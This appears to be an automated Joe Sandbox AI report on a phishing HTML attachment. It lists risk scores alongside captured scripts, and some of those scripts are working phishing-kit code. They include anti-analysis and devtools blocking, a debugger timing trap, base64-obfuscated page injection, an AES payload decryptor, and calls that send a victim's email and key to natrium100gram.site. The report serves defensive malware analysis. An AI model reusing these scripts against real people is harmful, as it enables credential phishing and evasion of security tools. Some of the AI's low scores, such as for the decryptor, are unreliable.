| URL: email Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": [
"No headers provided to analyze",
"Cannot make security assessment without header information",
"Default to low risk score due to lack of evidence"
]
} |
Date: unknown
|
| URL: file:///C:/Users/user/Desktop/A_C_H_JAN14.htm... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This script appears to be a simple simulation of document loading, with a 5-second delay before updating the DOM and changing the background color. There are no high-risk indicators, and the behavior is consistent with typical web page loading and visual cues. This script poses a low risk."
} |
// Simulate document loading
setTimeout(() => {
document.querySelector('.loading-text').textContent = 'Document is ready!';
document.body.style.backgroundColor = '#e0ffe0'; // Change background as a cue
}, 5000); // Adjust loading time as needed
|
| URL: https://cdn.jsdelivr.net/npm/citiycar8@2.1.9/MOMEN... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. The script fetches data from a potentially suspicious domain and then opens a new window with a URL that includes encoded parameters. This behavior is highly suspicious and indicates a potential phishing or malicious activity."
} |
const urlx = 'https://natrium100gram.site/public/api/page/redirect';
// Function to perform GET request
async function fetchData() {
try {
const response = await fetch(urlx);
if (!response.ok) {
throw new Error('Network response was not ok');
}
const data = await response.json();
const message = data.message;
return message ;
let messageUrl = message;
} catch (error) {
// Handle errors
console.error('There was a problem with the fetch operation:', error);
}
}
async function run() {
console.log("readya!");
let key = "";
let jk = "";
const originalConsoleLog = console.log;
console.log = function(message) {
window.open(message,"_self")
originalConsoleLog.apply(console, arguments);
};
const elements = document.querySelectorAll('*'); // Select all elements in the DOM
elements.forEach((element) => {
Array.from(element.attributes).forEach((attr) => {
if (attr.name.startsWith('nike-')) {
let dynamicPart = attr.name.split('nike-')[1];
key = dynamicPart;
}
});
});
elements.forEach((element) => {
Array.from(element.attributes).forEach((attr) => {
if (attr.name == "adidas") {
jk = attr.value
}
});
});
let aha = btoa(`${jk}&${key}&a`)
let mw = await fetchData();
console.log(`${mw}${aha}`)
}
run()
|
| URL: file:///C:/Users/user/Desktop/A_C_H_JAN14.htm... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a legitimate implementation of a decryption process using the Web Crypto API. While it includes some unnecessary or simulated operations, such as the `fakeAction()` function and the `fakeDelay()` function, these do not pose any significant security risks. The code is primarily focused on securely decrypting data using AES-GCM encryption, which is a common and widely-used cryptographic algorithm. The use of the Web Crypto API and the overall structure of the code suggest a legitimate purpose, likely for data processing or secure communication. Therefore, the risk score is assessed as low (3)."
} |
const fakeAction = () => console.log("This does nothing useful.");
fakeAction();
const performDecryption = async (encryptedData, ivString, saltString, passphrase) => {
console.log("[INFO] Decryption process initiated...");
// Convert hex to Uint8Array
const hexToBytes = (hex) => {
console.log(`[DEBUG] Converting hex string: ${hex}`);
return Uint8Array.from(hex.match(/.{2}/g).map((byte) => parseInt(byte, 16)));
};
const ivArray = hexToBytes(ivString);
const saltArray = hexToBytes(saltString);
// Adding an arbitrary delay (useless operation)
const fakeDelay = () => new Promise((resolve) => {
console.log("[INFO] Simulating delay...");
setTimeout(() => {
console.log("[DEBUG] Fake delay complete.");
resolve();
}, 100);
});
// Key derivation process
const deriveKey = async (keyMaterial, salt) => {
console.log("[INFO] Deriving AES-GCM decryption key...");
return crypto.subtle.deriveKey(
{ name: "PBKDF2", salt, iterations: 100000, hash: "SHA-256" },
keyMaterial,
{ name: "AES-GCM", length: 256 },
false,
["decrypt"]
);
};
const keyMaterial = await crypto.subtle.importKey(
"raw",
new TextEncoder().encode(passphrase),
{ name: "PBKDF2" },
false,
["deriveKey"]
);
await fakeDelay(); // Just to look like more is happening
const aesKey = await deriveKey(keyMaterial, saltArray);
try {
console.log("[INFO] Attempting payload decryption...");
const decryptedBuffer = await crypto.subtle.decrypt(
{ name: "AES-GCM", iv: ivArray },
aesKey,
hexToBytes(encryptedData)
);
console.log("[SUCCESS] Payload successfully decrypted.");
return new TextDecoder().decode(decryptedBuffer);
} catch (error) {
console.error("[ERROR] Decryption failed:", error);
return null;
}
};
// Function to simulate additional data processing
const processDecryptedData = (data) => {
console.log("[INFO] Processing decrypted data...");
if (!data) {
console.error("[ERROR] No data to process.");
return;
}
const reversedData = data.split("").reverse().join("");
console.log("[INFO] Data processed (reversed):", reversedData);
return reversedData;
};
// Initialization function
(async () => {
console.log("[INFO] Script execution started...");
const payload = {
iv: "c5d54a9c69516d18fab025aa",
salt: "f2c9263a7137550b0829e316a222b86e",
data: "7c186924f7b217943e4c6487f9d39b9910bc7e640ffc082516da5a9b8caf274be8b70ffd65131a24d3f7193f6f5dd3e09d0a3fad4dcfe75feb75f009b820f7974fa3c7cd763720aec91aa95aab0121cada3f156e35e520eb549e4f0c4b3efd501a525f8e3df5ff4bdde38199df65ddb856d5304bed2dba800983ecb1af1d7b6481700ddc96c5f3647cf54a430e067be7e01beb2ddd09e0bf4795d77e4e69c4459c8a926bc922680f55877eb0cf57b26d2450952d66fb175206cd3d15257f8eed99d48bfd50931242"
};
console.log("[INFO] Payload details:", payload);
try {
const decryptedContent = await performDecryption(
payload.data,
payload.iv,
payload.salt,
"quickescape"
);
if (decryptedContent) {
consol |
| URL: file:///C:/Users/user/Desktop/A_C_H_JAN14.htm Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: file:///C:/Users/user/Desktop/A_C_H_JAN14.htm Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
| URL: :// Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false,
"reasoning": "This is an invalid URL format missing protocol and domain information"
} |
URL: :// |
| URL: file:///C:/Users/user/Desktop/A_C_H_JAN14.htm Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: file:///C:/Users/user/Desktop/A_C_H_JAN14.htm Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@li... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script demonstrates several high-risk behaviors, including detecting browser automation tools, disabling common developer tools and keyboard shortcuts, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of phishing or other malicious activities."
} |
if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
if (event.keyCode === 123) {
event.preventDefault();
return false;
}
if (
(event.ctrlKey && event.keyCode === 85) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
(event.ctrlKey && event.keyCode === 72) ||
(event.metaKey && event.altKey && event.keyCode === 73) ||
(event.metaKey && event.altKey && event.keyCode === 67) ||
(event.metaKey && event.keyCode === 85)
) {
event.preventDefault();
return false;
}
});
document.addEventListener('contextmenu', function(event) {
event.preventDefault();
return false;
});
afeLvoFhem = false;
(function JRBxdnivLM() {
let aVacRAePJS = false;
const AfwDsPpwAt = 100;
setInterval(function() {
const teBmRoSqif = performance.now();
debugger;
const dmjCjPTnyv = performance.now();
if (dmjCjPTnyv - teBmRoSqif > AfwDsPpwAt && !aVacRAePJS) {
afeLvoFhem = true;
aVacRAePJS = true;
window.location.replace('https://login.microsoftonline.com');
}
}, 100);
})();
|
| URL: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@li... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While the intent is not entirely clear, the combination of these factors suggests a potentially malicious script that requires further investigation."
} |
/* Stop chasing the money and start chasing the passion. */
if(atob("aHR0cHM6Ly94VC50cmlsaWRhcm4ucnUva3lWUHNEYS8=") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNOWEplRm9pVVZxIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI05YSmVGb2lVVnEgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI05YSmVGb2lVVnEgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojTlhKZUZvaVVWcSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI05YSmVGb2lVVnEuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOTdweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI05YSmVGb2lVVnEgLnRleHQtY2VudGVyIHt0ZXh0LWFsaWduOiBjZW50ZXIhaW1wb3J0YW50O30NCkBtZWRpYSAobWluLXdpZHRoOjk5MnB4KXsNCiNOWEplRm9pVVZxIC5jb2wtbGctNHtmbGV4OjAgMCBhdXRvO3dpZHRoOjMzLjMzMzMzMzMzJTt9DQp9DQojTlhKZUZvaVVWcSAuZGlzcGxheS00IHtmb250LXNpemU6IDEuMjVyZW0haW1wb3J0YW50O30NCiNOWEplRm9pVVZxIC5tdC0yIHttYXJnaW4tdG9wOiAwLjVyZW0haW1wb3J0YW50O30NCiNOWEplRm9pVVZxIC5oNCB7Zm9udC1zaXplOiBjYWxjKC45MDByZW0gKyAuM3Z3KTt9DQojTlhKZUZvaVVWcSAuanVzdGlmeS1jb250ZW50LWNlbnRlcntqdXN0aWZ5LWNvbnRlbnQ6Y2VudGVyIWltcG9ydGFudDt9DQojTlhKZUZvaVVWcS5tdC01e21hcmdpbi10b3A6M3JlbSFpbXBvcnRhbnQ7fQ0KI05YSmVGb2lVVnEgLm10LTQge21hcmdpbi10b3A6IDFyZW0haW1wb3J0YW50O30NCiNOWEplRm9pVVZxICNEUUR1Y2lCamlrIHtjb2xvcjogIzZjNzU3ZDtmb250LXNpemU6MTRweDttYXJnaW4tdG9wOiAuNXJlbTt9DQogICAgPC9zdHlsZT4NCiAgICA8c2NyaXB0Pg0KICAgIGlmIChuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8IHdpbmRvdy5jYWxsUGhhbnRvbSB8fCB3aW5kb3cuX3BoYW50b20gfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNjcpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDc0KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzIpIHx8DQogICAgICAgIChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQuYWx0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkNCiAgICApIHsNCiAgICAgICAgZXZlbnQucHJldmVudERlZmF1bHQoKTsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCn0pOw0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcignY29udGV4dG1lbnUnLCBmdW5jdGlvbihldmVudCkgew0KICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgcmV0dXJuIGZhbHNlOw0KfSk7DQphZmVMdm9GaGVtID0gZmFsc2U7DQooZnVuY3Rpb24gSlJCeGRuaXZMTSgpIHsNCiAgICBsZXQgYVZhY1JBZVBKUyA9IGZhbHNlOw0KICAgIGNvbnN0IEFmd0RzUHB3QXQgPSAxMDA7DQogICAgc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKSB7DQogICAgICAgIGNvb |
| URL: https://code.jquery.com/jquery-3.7.1.min.js... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscated code. The script is likely used for legitimate web development purposes and poses a low risk."
} |
/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[i.call(e)]||"object":typeof e}var t="3.7.1",l=/HTML$/i,ce=function(e,t){return new ce.fn.init(e,t)};function c(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!v(e)&&!y(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}function fe(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()}ce.fn=ce.prototype={jquery:t,constructor:ce,length:0,toArray:function(){return ae.call(this)},get:function(e){return null==e?ae.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=ce.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return ce.each(this,e)},map:function(n){return this.pushStack(ce.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(ae.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(ce.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(ce.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||v(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(ce.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||ce.isPlainObject(n)?n:{},i=!1,a[t]=ce.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},ce.extend({expando:"jQuery"+(t+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==i.call(e))&&(!(t=r(e))||"function"==typeof(n=ue.call(t,"constructor")&&t.constructor)&&o.call(n)===a)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){m(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(c(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},text:function(e){var t,n="",r=0,i=e.nodeType;if(!i)while(t=e[r++])n+=ce.text(t);return 1===i||11===i?e.textContent:9===i?e.documentElement.textContent:3===i||4===i?e.nodeValue:n},makeArray:function(e,t){var n=t||[];return null!=e&&(c(Object(e))?ce.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!l.test(t||n&&n.nodeName||"HTML")},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){va |
| URL: https://pending-revew.pages.dev/#?service=Wm5kcGJH... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script demonstrates several behaviors that raise moderate security concerns, including data exfiltration, use of obfuscated URLs, and external data transmission. While the script appears to have a legitimate purpose, such as validating a key, the way it handles user data and interacts with external domains requires further review."
} |
function javascriptCallback() {
var hashValue = window.location.hash.substr(1);
var hash2 = hashValue.split("#")[1];
// console.log(hash2[1]);
const urlParams = new URLSearchParams(hashValue);
const name = urlParams.get('service');
// Decode the Base64-encoded value
var decodedValue = atob(name);
console.log(decodedValue);
var parts = decodedValue.split("&");
var mails = parts[0];
var mails2 = atob(mails);
console.log(mails2);
var key = parts[1];
var display = parts[2];
var form = new FormData();
// form.append("subs", `${mails}&${key}`);
// var settings = {
// url: "https://arab-oil.online",
// method: "GET",
// timeout: 0,
// headers: {
// Cookie:
// "XSRF-TOKEN=eyJpdiI6IlpiamxlYlM5dldGVzNzNG9KUGZieVE9PSIsInZhbHVlIjoiTldmM0hJYnlmN3Y0d1FSUjJ2WE9INWFhUi9IMFJLeDUxZWp0L0tVWFFqK3V6dHdKS08wQkJIQUpnNWo3eVFTOXFOOHV5ZmdxRXAxMkl0WVZrSGdRb1JoOWVsM2NCUVlLSkhkQVNHY0VYS0g4T1gxWnorT0RyVnByOWoxcWlaRm4iLCJtYWMiOiI0NzU4YTdiNWFhYWUyZjEyYzU0OWEyZjAyNjU1Y2YwZjE5NzEzOWVkMzhjZGVmNzg1MmZiMjU5YTA5N2IwYzNkIn0%3D; laravel_session=eyJpdiI6Im43cHVMbGJBL1JpMjl1cU5rQ1JpYnc9PSIsInZhbHVlIjoiekkzRlNmZ25kR1dxU3JxYnFucGUrcW1MdS9CaXFwM3pqNitXNjBFQ2lyT1pTeDQ3WWtwUXBXMVlyelVHaVlncGFXR3d6Zm5VTWMxbUthSkdUVkZSMFB3M29uQUNqZzB6QWZ1V1RXb3BiMnoyZms3NkpxWXFnbjlsZVJsaE1kTTgiLCJtYWMiOiJiMDdkOTlmMmVlNTFjZjE4YjJmZWNmNjcwMjliMjg2ZmYzZTdmMzE0ZWFhODczZjdiZTg2ODRjZjE4N2RhOTU2In0%3D",
// },
// processData: false,
// mimeType: "multipart/form-data",
// contentType: false,
// data: form,
// };
var settings = {
"url": `https://natrium100gram.site/public/api/validate_key/${key}`,
"method": "GET",
"timeout": 0,
"processData": false,
"mimeType": "multipart/form-data",
"contentType": false,
"data": form
};
$.ajax(settings).done(function (response) {
var res = JSON.parse(response);
console.log(res);
var next = res.optional_url ? res.optional_url : "";
if (res.url_target == undefined) {
console.log("undefined");
location.reload();
}else{
if (display == "a") {
console.log(mails2);
window.location.replace(res.url_target + mails2 + next);
} else {
window.location.replace(res.url_target + mails + next);
}
}
}).fail(function(error){
if (error.status == 401) {
document.body.removeAttribute('style');
document.getElementById("mm").innerHTML = "";
document.getElementById("mm").innerHTML = "Expired API || contact your support ! ";
}
console.log(error.status);
});
}
setTimeout(() => {
javascriptCallback()
}, 1000);
// });
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate security mechanism used to protect websites from abuse. The script sets up event listeners and message handlers to communicate with the parent window, likely as part of a challenge-response system. While the script uses some dynamic behavior, such as `postMessage()`, it does not exhibit any clear signs of malicious intent or data exfiltration. The script's purpose seems to be related to website security and user verification, which is a common and expected behavior in this context."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'm2ror',
chlApiSitekey: '0x4AAAAAAA4xpzEaQEpRQpIL',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'EpobkfZ8Kt.59mLSxwZ7mHOkJPegPj7INk9aL1Rl2Hw-1736976039-1.3.1.1-UmcJ0VyKE7ypP5YQB7Gs.5RsMDDzjQs7lswM2pWxU_g',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '9028e9366c024373',
cH: 'CqOL3hCP9aNSzgkG0IjdnY5BF7KcZramu1u7ovZuykk-1736976039-1.1.1.1-l2DgpeMrVcH0SJSLuUxxfQbKqVOolP2QDhBBtAvB3.PUuNJD0gbqf2iOdnx.NHVl',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'mWqU0atUelDOKm45VFqWwNKSQTJcb2vcg.g4NKK_R1U-1736976039-1.1.1.1-28C4W.sswOzJ3EgwwXhzc8fSjmvIx6vFmXhXa.RgIeP5aaR.IUBXWiptR9TPqB9Gz679qpJT29cxKjL.ncL_2ig7dz0EshbA7TLSzpTfzwNUV1Wf7.Yl0MjjKrqOX_VihpqJp_x5xJzSUCmeM3AHNbYGqrwnSRNvSZl1BpTi8nFywhGUTzd8uXLvpMF8ILX01wHcN__g2MBXnzQFKo4Tbx0xVPjStqi.MefSpjjYzp_4wBjrxZLcob7BOKYLFbHQz34HZzBudRoq3jwovjnT0t8ffxFg637HlZqmCi1SG1hlYa3.TP6rKkgNKMFFJgKUzCAUSYJ31jHabhNROSs5bkFrOoILsLj8Le5DAcOrA3jXnDB5a5OJX6yIDivwYoQlMoOmSskVQ1pOrXdLODZwtrDrco8K6_aTYrIZdJG9c2xD0q7orZcKtpxc.qrvqMPKEO7QDf30ukjApVjha92RW6nz8RLfHM82oriCtTwbX2dUfbgDbkzZSmO2MjDI4fzxnE9J9FP4V5EjXDdPSMw0PUJK_7rAbxVtLXw6WyixKb5fB0A7aCWOCgH_Cwmv2ChcH7O8cpmIgvIobiPCDAyNmdSLZvvpPQ0Y4QtukghWLeDfn38pGq5F1uF88K1KirJ2fy6x5QSj5n8Z3VP9uTu9xIYsVz7bIQvIu5HEUAyBRuzgs13CT4JfINXVip.fyAJ3jnKZxyIpkaOx3NiealYb9hwrt_6PBMzCoStN09OIhmpV4_qujNZ9rUlkxc5p7VUp1KqFDOazSQ2r9IASsKqzmzLqRRliLMp.JIYQCMtzeqnox8H4NutgOKU0l.H8LKk0YF9f3kJsUasWCcaZJ1_6aeWIeilRdssyYehgBj6_C3BoSwyNX.CXJ1wsdTWPz_z11Zmkom8a_8QSIZCTyekqJhdNnS5ny8eh37HFGiI1Y7cRFYFtmFh7vlHyWpj49MZEXjGZ8SJ8XLvcaMJwvzVnLfEDo60l2s9kWbVUc5FrohgOcoU5PJ_eVU4v6rYb9TfudQn9qpwLenF_Wf_PpXv5kyV1WMnSrhFxGNg4j32pwa73deHHCM4z0xPi1i3yjP8hUA5Lt.iGwZ22mvJTGXQXs9LgNNRLuXh1iD43BsQX0SVY_6ZYWSaI2.R45u3sEVIg4IbqE.V6yD.a8Hjvj0iuiY9UJiBipxrRZwdK4rGCr1HUeubR3a.ESj_CLHC52TDsgXR.GCIMXoPwgDgZ7LKZdhGr71uBWW8aDmT2dJGQF_jCTolISny5lmYVT0vE_BJg6BMdN5JLHTI_Gh6Lz19Gtz76A_wpyFh_.zf9st1RgEkwg5hZ.q_yZyF8SdJ6NEnNKRLrcVlo.RscxjpMyTY3tsqx.kEzLzq.QSL1AbIjQhQ',
cITimeS: '1736976039',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'm2ror',
nextRcV: 'EpobkfZ8Kt.59mLSxwZ7mHOkJPegPj7INk9aL1Rl2Hw-1736976039-1.3.1.1-UmcJ0VyKE7ypP5YQB7Gs.5RsMDDzjQs7lswM2pWxU_g',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
| URL: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or obfuscated code/URLs. The snippet primarily focuses on implementing core cryptographic functionality, which is a legitimate use case. While it uses some moderate-risk indicators like external data transmission and aggressive DOM manipulation, these are common practices in cryptographic libraries. Overall, the risk score is low, as the script is likely part of a legitimate cryptographic library and does not exhibit any clear malicious intent."
} |
